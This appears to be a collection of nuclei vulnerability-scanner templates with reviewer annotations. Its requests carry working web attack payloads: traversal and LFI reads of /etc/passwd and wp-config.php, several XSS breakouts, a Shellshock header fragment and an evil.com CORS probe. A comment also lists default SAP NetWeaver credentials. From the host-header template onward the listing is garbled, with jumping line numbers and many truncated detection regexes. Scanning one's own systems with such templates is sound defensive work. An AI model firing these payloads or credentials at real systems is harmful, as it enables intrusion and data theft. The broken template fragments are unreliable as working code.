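      # Detection only: it does not show that the rules allow public reads.
      - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
    matchers:
      - type: word
        words:
          - "Could not parse auth token"
        part: body

---
# /panels/kubernetes-pods.yaml
id: kubernetes-pods-api

info:
  name: Kubernetes Pods API
  author: ilovebinbash
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info

requests:
  - method: GET
    path:
      # Kubelet API. A pod listing served without credentials indicates the
      # kubelet accepts anonymous requests (typically /run and /exec too).
      - '{{BaseURL}}:10250/pods'
    # Fixed: both matchers must hold; with nuclei's default OR,
    # "application/json" alone matched any JSON endpoint on that port.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "apiVersion"
        part: body
      - type: word
        words:
          - "application/json"
        part: header

---
# /vulnerabilities/rce-shellshock-user-agent.yaml
# NOTE(review): truncated in the listing — template lines 12-18 (the rest of
# the User-Agent value, the path list and the matcher type/regex) are
# missing; only `part: body` survives. Restore from the source file before
# use; the fragment is reproduced as shown, not reconstructed.
id: rce-user-agent-shell-shock

info:
  name: Remote Code Execution Via (User-Agent)
  author: 0xelkomy
  severity: high

requests:
  - method: GET
    headers:
      User-Agent: "{ :;}; echo $("
    # ... template lines 12-18 missing from the listing; surviving tail:
    #         part: body

---
# /cves/CVE-2018-7490.yaml
id: CVE-2018-7490

info:
  name: uWSGI PHP Plugin Directory Traversal
  author: madrobot
  severity: high

requests:
  - method: GET
    path:
      # Percent-encoded ../ segments (%2f) escape the document root.
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

---
# /files/tomcat-scripts.yaml
id: tomcat-scripts

info:
  name: Detect Tomcat Exposed Scripts
  author: Co0nan
  severity: low
  # The bundled example webapps should not be deployed in production; they
  # are a common source of session/cookie and XSS test pages.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/examples/servlets/index.html"
      - "{{BaseURL}}/examples/jsp/index.html"
    matchers:
      - type: word
        words:
          - "JSP Examples"
          - "JSP Samples"
          - "Servlets Examples"
        condition: or
        part: body

---
# /security-misconfiguration/basic-cors.yaml
id: basic-cors-misconfig

info:
  name: Basic CORS misconfiguration
  author: nadino
  severity: medium
  # Reflecting an arbitrary Origin is only exploitable against authenticated
  # data when Access-Control-Allow-Credentials: true is returned as well;
  # check that header on a hit before rating it.

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      Origin: "https://evil.com"
    matchers:
      - type: word
        words:
          - "Access-Control-Allow-Origin: https://evil.com"
        part: header

---
# /technologies/gitlab-detect.yaml
id: Gitlab-Detect

info:
  name: Detect Gitlab
  author: ehsahil
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/users/sign_in"
      - "{{BaseURL}}/users/sign_up"
      - "{{BaseURL}}/explore"
    matchers:
      - type: word
        words:
          - "GitLab"
          - "Register for GitLab"
          - "Explore GitLab"
        condition: or
        part: body

---
# /vulnerabilities/wordpress-duplicator-path-traversal.yaml
id: wordpress-duplicator-path-traversal

info:
  name: WordPress duplicator Path Traversal
  author: madrobot
  severity: high

requests:
  - method: GET
    path:
      # Fixed: the path used em-dashes (wp—admin/admin—ajax.php), which can
      # never reach the real endpoint; ASCII hyphens restored.
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"
    matchers:
      - type: word
        words:
          - "DB_NAME"
        part: body

---
# /examples/dns-multiple-example.yaml
id: dns-multiple-example

info:
  name: DNS Multiple test
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}"
    type: A
    class: inet
    recursion: true
    retries: 3
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "example-cname.com"

      - type: word
        words:
          - "NXDOMAIN"

---
# /cves/CVE-2019-19368.yaml
# NOTE(review): truncated in the listing — template lines 12-18 (the end of
# the path and the matcher type/words) are missing; only `part: body`
# survives. Restore from the source file before use.
id: CVE-2019-19368

info:
  name: Rumpus FTP Web File Manager 8.2.9.1 XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Login?!'>"
    # ... template lines 12-18 missing from the listing; surviving tail:
    #         part: body

---
# /cves/CVE-2019-8982.yaml
id: CVE-2019-8982

info:
  name: Wavemaker Studio 6.6 LFI/SSRF
  author: madrobot
  severity: high

requests:
  - method: GET
    path:
      # inUrl=file///etc/passwd is kept as listed (no colon after "file").
      - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

---
# /cves/CVE-2020-8115.yaml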
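id: CVE-2020-8115

info:
  name: Revive Adserver XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      # Breaks out of the setTimeout('...') string that afr.php builds from
      # the refresh parameter.
      - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "alert(1337)"
        part: body

---
# /panels/sap-netweaver-detect.yaml
id: sap-netweaver-portal-detect

info:
  name: SAP NetWeaver Portal detect
  author: organiccrap
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info
  # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
  # (not tested by this template; it only detects the portal login page)

requests:
  - method: GET
    path:
      - "{{BaseURL}}/irj/portal"
    matchers:
      - type: word
        words:
          - "SAP NetWeaver Portal"
        part: body

---
# /vulnerabilities/moodle-filter-jmol-xss.yaml
id: moodle-filter-jmol-xss

info:
  name: Moodle filter_jmol XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '\"};alert(1337);//'
        part: body

---
# /cves/CVE-2019-3799.yaml
id: CVE-2019-3799

info:
  name: Spring-Cloud-Config-Server Directory Traversal
  author: madrobot
  severity: high

requests:
  - method: GET
    path:
      # Double-encoded traversal (%252f) in the label/path segment.
      - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - 'root:[x*]:0:0:'
        part: body

---
# /vulnerabilities/discourse-xss.yaml
# Fixed: the id contained a space (not a valid template id).
# NOTE(review): the matcher word is empty in this listing (the reflected
# payload was most likely lost); an empty word matches every body, so the
# template as shown fires on every 200. Restore the expected reflected
# string from the source file before use.
id: discourse-xss

info:
  name: Discourse CMS XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\">'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - ""
        part: body

---
# /security-misconfiguration/front-page-misconfig.yaml
id: front-page-misconfig

info:
  # Fixed typo in the name (discloure).
  name: FrontPage configuration information disclosure
  author: JTeles
  severity: low
  # reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications

requests:
  - method: GET
    path:
      - "{{BaseURL}}/_vti_inf.html"
    # Matching on an exact body size is brittle (any 247-byte page hits, a
    # differently formatted _vti_inf.html misses). Prefer a word matcher on
    # the file's contents once a sample is available — TODO.
    matchers:
      - type: size
        size:
          - 247

---
# /tokens/google-api-key.yaml
id: google-api-key

info:
  name: Google API Key
  author: Swissky
  severity: medium
  # Google API keys are frequently meant to be embedded in client pages;
  # impact depends on which APIs the key is enabled for and whether it has
  # referrer/IP restrictions. Verify before reporting as a leak.

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body
        regex:
          - "AIza[0-9A-Za-z\\-_]{35}"
    extractors:
      - type: regex
        part: body
        regex:
          - "AIza[0-9A-Za-z\\-_]{35}"
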
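---
# /vulnerabilities/wordpress-wordfence-xss.yaml
# NOTE(review): the matcher word is empty in this listing (the reflected
# payload was most likely lost); an empty word matches every body. The
# request's decoded payload is  "><svg/onload=alert(1337)>  so the expected
# reflection is presumably that string — confirm against the source file.
id: wordpress-wordfence-xss

info:
  name: WordPress Wordfence 7.4.6 Cross Site Scripting
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
    matchers:
      - type: word
        words:
          - ""
        part: body

---
# /dns/dead-host-with-cname.yaml
id: dead-host-with-cname

info:
  name: dead-host-with-cname
  author: pdnuclei - projectdiscovery.io
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info
  # An NXDOMAIN answer that still carries a CNAME is the classic precondition
  # for subdomain takeover; the target of the CNAME still has to be checked.

dns:
  - name: "{{FQDN}}"
    type: A
    class: inet
    recursion: true
    retries: 5
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "NXDOMAIN"

      - type: word
        words:
          - "IN\tCNAME"

---
# /files/apc_info.yaml
id: apcu-service

info:
  name: APCu service information leakage
  author: koti2
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/apc/apc.php"
      - "{{BaseURL}}/apc.php"
    matchers:
      - type: word
        words:
          - "APCu Version Information"
          - "General Cache Information"
          - "Detailed Memory Usage and Fragmentation"
        condition: or
        part: body

---
# /cves/CVE-2019-19908.yaml
# NOTE(review): the matcher word is empty in this listing (the reflected
# payload was most likely lost); an empty word matches every body, so the
# template as shown fires on every 200. The request's decoded payload is
# "><script>alert(1337)</script><  — confirm the expected reflection
# against the source file.
id: CVE-2019-19908

info:
  name: phpMyChat-Plus XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - ""
        part: body

---
# /technologies/jaspersoft-detect.yaml
id: Jaspersoft-detect

info:
  name: Jaspersoft detected
  author: koti2
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jasperserver/login.html?error=1"
    matchers:
      - type: word
        words:
          - "TIBCO Jaspersoft: Login"
          - "Could not login to JasperReports Server"
          - "About TIBCO JasperReports Server"
        condition: or
        part: body

---
# /cves/CVE-2018-18069.yaml
# NOTE(review): truncated in the listing — the end of the POST body and the
# matcher block (template lines 12-16) are cut; only this fragment survives:
#   body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\">alert(1337)"
#   part: body
# Restore from the source file before use.
id: CVE-2018-18069

info:
  name: Wordpress unauthenticated stored xss
  author: nadino
  severity: medium

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php"
    # ... body and matchers missing from the listing (see note above) ...

---
# /vulnerabilities/moodle-filter-jmol-lfi.yaml
id: moodle-filter-jmol-lfi

info:
  name: Moodle filter_jmol LFI
  author: madrobot
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

---
# /cves/CVE-2018-20824.yaml
id: CVE-2018-20824

info:
  name: Atlassian Jira WallboardServlet XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - alert(document.domain)
        part: body

---
# /files/docker-registry.yaml
id: docker-registry

info:
  name: Docker Registry Listing
  author: puzzlepeaches
  severity: medium
  # An unauthenticated catalog usually means images (and any secrets baked
  # into their layers) can be pulled; check whether push is open as well.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/v2/_catalog"
    redirects: true
    max-redirects: 1
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"repositories":'
        part: body
      - type: word
        words:
          - "application/json"
        part: header

---
# /tokens/mailchimp-api-key.yaml
id: mailchimp-access-key-value

info:
  name: Mailchimp API Value
  author: puzzlepeaches
  severity: medium
  # 32 hex chars followed by a "-usNN" datacenter suffix; a bare 32-hex
  # value without the suffix is not matched.

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: regex
        part: body
        regex:
          - "[0-9a-f]{32}-us[0-9]{1,2}"
    extractors:
      - type: regex
        part: body
        regex:
          - "[0-9a-f]{32}-us[0-9]{1,2}"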
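---
# /files/elasticsearch.yaml
id: elasticsearch

info:
  name: ElasticSearch Information Disclosure
  author: Shine
  severity: low

requests:
  - method: GET
    path:
      # Note: _cat/indices returns a text table, not the JSON that the word
      # matcher looks for, so with AND only the _all/_search paths can hit.
      - '{{BaseURL}}/_cat/indices?v'
      - '{{BaseURL}}:9200/_cat/indices?v'
      - '{{BaseURL}}/_all/_search'
      - '{{BaseURL}}:9200/_all/_search'
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"took":'
        part: body
      - type: status
        status:
          - 200

---
# /dns/cname-service-detector.yaml
id: cname-service-detector

info:
  name: 3rd party service checker
  author: bauthard
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info

dns:
  - name: "{{FQDN}}"
    type: CNAME
    class: inet
    recursion: true
    retries: 5
    matchers-condition: or
    matchers:
      - type: word
        name: zendesk
        words:
          - "zendesk.com"
      - type: word
        name: github
        words:
          - "github.io"

---
# /panels/pulse-secure-panel.yaml
id: pulse-secure-panel

info:
  name: Pulse Secure VPN Panel
  author: bsysop
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
    # OR is intended here: either the redirect target in the headers or the
    # stylesheet reference in the body identifies the panel.
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "/dana-na/auth/welcome.cgi"
        part: header

      - type: word
        words:
          - "/dana-na/css/ds.css"
        part: body

---
# /cves/CVE-2019-5418.yaml
id: CVE-2019-5418

info:
  name: File Content Disclosure on Rails
  author: omarkurt
  severity: medium
  # reference: https://github.com/omarkurt/CVE-2019-5418

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      # The trailing "{{" is part of the published payload, not a nuclei
      # variable; keep it verbatim.
      Accept: ../../../../../../../../etc/passwd{{
    # Fixed: both matchers must hold; with nuclei's default OR, any 200 hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

---
# /cves/CVE-2019-14974.yaml
id: CVE-2019-14974

info:
  name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
  author: madrobot
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
    # The word is the vulnerable client-side line that reads desktop_url
    # unsanitised, so a hit means the vulnerable page is present rather
    # than a confirmed execution.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "url = window.location.search.split(\"?desktop_url=\")[1]"
        part: body

---
# /files/wadl-files.yaml
id: wadl-files

info:
  name: wadl file disclosure
  author: 0xrudra
  # "informative" is not a nuclei severity level; the examples use "info".
  severity: info
  # A reachable WADL/WSDL maps the API surface for further testing; it is
  # often published on purpose, so treat it as recon rather than a finding.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/application.wadl"
      - "{{BaseURL}}/service?Wsdl"
    matchers:
      - type: word
        words:
          - "This is simplified WADL with user and core resources only"
          - "\"http://jersey.java.net/\""
          - "http://wadl.dev.java.net/2009/02"
        condition: or
        part: body

---
# /vulnerabilities/x-forwarded-host-injection.yaml
id: host-header-injection

info:
  name: Host Header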
Injection (x-forwarded-host) 5 | author: melbadry9 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | # MD5 hash of melbadry9 13 | X-Forwarded-Host: "0021e78f48fe6525798294b7711c6f72.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "0021e78f48fe6525798294b7711c6f72" 20 | -------------------------------------------------------------------------------- /cves/CVE-2018-19439.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19439 2 | 3 | info: 4 | name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow> 181 | condition: or 182 | part: body 183 | - type: regex 184 | name: moodle 185 | regex: 186 | - ]+moodlelogo 187 | condition: or 188 | part: body 189 | - type: regex 190 | name: minibb 191 | regex: 192 | - [^<]+\n 218 | condition: or 219 | part: body 220 | - type: regex 221 | name: woocommerce 222 | regex: 223 | - 259 | - 260 | condition: or 261 | part: body 262 | - type: regex 263 | name: youtrack 264 | regex: 265 | - no-title="YouTrack"> 266 | - data-reactid="[^"]+">youTrack ([0-9.]+)< 267 | - type="application/opensearchdescription\+xml" title="YouTrack"/> 268 | condition: or 269 | part: body 270 | - type: regex 271 | name: grandnode 272 | regex: 273 | - "(?: 317 | condition: or 318 | part: body 319 | - type: regex 320 | name: jsdelivr 321 | regex: 322 | - <[^>]+?//cdn\.jsdelivr\.net/ 323 | condition: or 324 | part: body 325 | - type: regex 326 | name: user.com 327 | regex: 328 | - ]+/id="ue_widget" 329 | condition: or 330 | part: body 331 | - type: regex 332 | name: smart-ad-server 333 | regex: 334 | - ]+smartadserver\.com\/call 335 | condition: or 336 | part: body 337 | - type: 
regex 338 | name: wordpress-super-cache 339 | regex: 340 | - 437 | - ]+(?:typolight|contao)\.css 438 | condition: or 439 | part: body 440 | - type: regex 441 | name: wpcache 442 | regex: 443 | - 561 | condition: or 562 | part: body 563 | - type: regex 564 | name: boldgrid 565 | regex: 566 | - ]+boldgrid 567 | - ]+post-and-page-builder 568 | - ]+s\d+\.boldgrid\.com 569 | condition: or 570 | part: body 571 | - type: regex 572 | name: zurb-foundation 573 | regex: 574 | - ]+foundation[^>"]+css 575 | -
]*class="[^"]*(?:small|medium|large)-\d{1,2} columns 576 | condition: or 577 | part: body 578 | - type: regex 579 | name: shoptet 580 | regex: 581 | - ]*href="https?://cdn\.myshoptet\.com/ 582 | condition: or 583 | part: body 584 | - type: regex 585 | name: phpalbum 586 | regex: 587 | - 588 | condition: or 589 | part: body 590 | - type: regex 591 | name: rbs-change 592 | regex: 593 | - ]+xmlns:change= 594 | condition: or 595 | part: body 596 | - type: regex 597 | name: appnexus 598 | regex: 599 | - <(?:iframe|img)[^>]+adnxs\.(?:net|com) 600 | condition: or 601 | part: body 602 | - type: regex 603 | name: lightbox 604 | regex: 605 | - ]*href="[^"]+lightbox(?:\.min)?\.css 606 | condition: or 607 | part: body 608 | - type: regex 609 | name: shopware 610 | regex: 611 | - Shopware ([\d\.]+) [^<]+ 612 | condition: or 613 | part: body 614 | - type: regex 615 | name: webmine 616 | regex: 617 | - <iframe[^>]+src=[\'"]https://webmine\.cz/miner\?key= 618 | condition: or 619 | part: body 620 | - type: regex 621 | name: fluxbb 622 | regex: 623 | - <p id="poweredby">[^<]+<a href="https?://fluxbb\.org/"> 624 | condition: or 625 | part: body 626 | - type: regex 627 | name: gemius 628 | regex: 629 | - <a [^>]*onclick="gemius_hit 630 | condition: or 631 | part: body 632 | - type: regex 633 | name: sql-buddy 634 | regex: 635 | - (?:<title>SQL Buddy|<[^>]+onclick="sideMainClick\("home\.php) 636 | condition: or 637 | part: body 638 | - type: regex 639 | name: jenkins 640 | regex: 641 | - Jenkins ver\. 
([\d.]+) 642 | condition: or 643 | part: body 644 | - type: regex 645 | name: t-soft 646 | regex: 647 | - 648 | condition: or 649 | part: body 650 | - type: regex 651 | name: datocms 652 | regex: 653 | - <[^>]+https://www\.datocms-assets\.com 654 | condition: or 655 | part: body 656 | - type: regex 657 | name: sonarqubes 658 | regex: 659 | - ]*src="[^/]*//[^/]*serving-sys\.com/) 667 | condition: or 668 | part: body 669 | - type: regex 670 | name: koken 671 | regex: 672 | - 673 | - 815 | condition: or 816 | part: body 817 | - type: regex 818 | name: meebo 819 | regex: 820 | - (?: 1627 | - 1628 | condition: or 1629 | part: body 1630 | - type: regex 1631 | name: a-frame 1632 | regex: 1633 | - ]*> 1634 | condition: or 1635 | part: body 1636 | - type: regex 1637 | name: dreamweaver 1638 | regex: 1639 | - 1704 | - 1705 | - ]+atlassian\.com/(?:software/jira|jira-bug-tracking/)[^>]+>Atlassian\s+JIRA(?:[^v]*v(?:ersion: )?(\d+\.\d+(?:\.\d+)?))?' 1712 | condition: or 1713 | part: body 1714 | - type: regex 1715 | name: sdl-tridion 1716 | regex: 1717 | - ]+_tcm\d{2,3}-\d{6}\. 
1718 | condition: or 1719 | part: body 1720 | - type: regex 1721 | name: microsoft-publisher 1722 | regex: 1723 | - (?:]*xmlns:w="urn:schemas-microsoft-com:office:publisher"|\s*<\/div> 2038 | condition: or 2039 | part: body 2040 | - type: regex 2041 | name: rebelmouse 2042 | regex: 2043 | - 2141 | condition: or 2142 | part: body 2143 | - type: regex 2144 | name: cargo 2145 | regex: 2146 | - ]+Cargo feed 2147 | condition: or 2148 | part: body 2149 | - type: regex 2150 | name: sentry 2151 | regex: 2152 | - ']*>\s*Raven\.config\(''[^'']*'', \{\s+release: ''([0-9\.]+)''' 2153 | condition: or 2154 | part: body 2155 | - type: regex 2156 | name: visual-website-optimizer 2157 | regex: 2158 | - 2159 | condition: or 2160 | part: body 2161 | - type: regex 2162 | name: twiki 2163 | regex: 2164 | - ]*(?:title|alt)="This site is powered by the TWiki collaboration platform 2165 | condition: or 2166 | part: body 2167 | - type: regex 2168 | name: javadoc 2169 | regex: 2170 | - 2171 | condition: or 2172 | part: body 2173 | - type: regex 2174 | name: tamago 2175 | regex: 2176 | - ]*href="http://tamago\.temonalab\.com 2177 | condition: or 2178 | part: body 2179 | - type: regex 2180 | name: haddock 2181 | regex: 2182 | -

Produced by Haddock version ([0-9.]+)

2183 | condition: or 2184 | part: body 2185 | - type: regex 2186 | name: lightmon-engine 2187 | regex: 2188 | - 2344 | condition: or 2345 | part: body 2346 | - type: regex 2347 | name: roundcube 2348 | regex: 2349 | - RoundCube 2350 | condition: or 2351 | part: body 2352 | - type: regex 2353 | name: advanced-web-stats 2354 | regex: 2355 | - aws\.src = [^<]+caphyon-analytics 2356 | condition: or 2357 | part: body 2358 | - type: regex 2359 | name: riskified 2360 | regex: 2361 | - <[^>]*beacon\.riskified\.com 2362 | - <[^>]*c\.riskified\.com 2363 | condition: or 2364 | part: body 2365 | - type: regex 2366 | name: dnn 2367 | regex: 2368 | - <!-- by DotNetNuke Corporation 2369 | - <!-- DNN Platform 2370 | condition: or 2371 | part: body 2372 | - type: regex 2373 | name: w3-total-cache 2374 | regex: 2375 | - <!--[^>]+W3 Total Cache 2376 | condition: or 2377 | part: body 2378 | - type: regex 2379 | name: tessitura 2380 | regex: 2381 | - '<!--[^>]+Tessitura Version: (\d*\.\d*\.\d*)?' 2382 | condition: or 2383 | part: body 2384 | - type: regex 2385 | name: synology-diskstation 2386 | regex: 2387 | - <noscript><div class='syno-no-script' 2388 | condition: or 2389 | part: body 2390 | - type: regex 2391 | name: whooshkaa 2392 | regex: 2393 | - <iframe src="[^>]+whooshkaa\.com 2394 | condition: or 2395 | part: body 2396 | - type: regex 2397 | name: cubecart 2398 | regex: 2399 | - (?:Powered by <a href=[^>]+cubecart\.com|<p[^>]+>Powered by CubeCart) 2400 | condition: or 2401 | part: body 2402 | - type: regex 2403 | name: powergap 2404 | regex: 2405 | - <a[^>]+title="POWERGAP 2406 | - <input type="hidden" name="shopid" 2407 | condition: or 2408 | part: body 2409 | - type: regex 2410 | name: amcharts 2411 | regex: 2412 | - <svg[^>]*><desc>JavaScript chart by amCharts ([\d.]*) 2413 | condition: or 2414 | part: body 2415 | - type: regex 2416 | name: webflow 2417 | regex: 2418 | - <html[^>]+data-wf-site 2419 | condition: or 2420 | part: body 2421 | - type: regex 2422 | name: dokuwiki 
2423 | regex: 2424 | - <div[^>]+id="dokuwiki__> 2425 | - <a[^>]+href="#dokuwiki__ 2426 | condition: or 2427 | part: body 2428 | - type: regex 2429 | name: jquery-pjax 2430 | regex: 2431 | - <div[^>]+data-pjax-container 2432 | condition: or 2433 | part: body 2434 | - type: regex 2435 | name: phpdocumentor 2436 | regex: 2437 | - <!-- Generated by phpDocumentor 2438 | condition: or 2439 | part: body 2440 | - type: regex 2441 | name: owncloud 2442 | regex: 2443 | - <a href="https://owncloud\.com" target="_blank">ownCloud Inc\.</a><br/>Your Cloud, Your Data, Your Way! 2444 | condition: or 2445 | part: body 2446 | - type: regex 2447 | name: hexo 2448 | regex: 2449 | - Powered by <a href="https?://hexo\.io/?"[^>]*>Hexo</ 2450 | condition: or 2451 | part: body 2452 | - type: regex 2453 | name: atlassian-bitbucket 2454 | regex: 2455 | - <li>Atlassian Bitbucket <span title="[a-z0-9]+" id="product-version" data-commitid="[a-z0-9]+" data-system-build-number="[a-z0-9]+"> v([\d.]+)< 2456 | condition: or 2457 | part: body 2458 | - type: regex 2459 | name: phppgadmin 2460 | regex: 2461 | - (?:<title>phpPgAdmin|phpPgAdmin) 2462 | condition: or 2463 | part: body 2464 | - type: regex 2465 | name: adnegah 2466 | regex: 2467 | -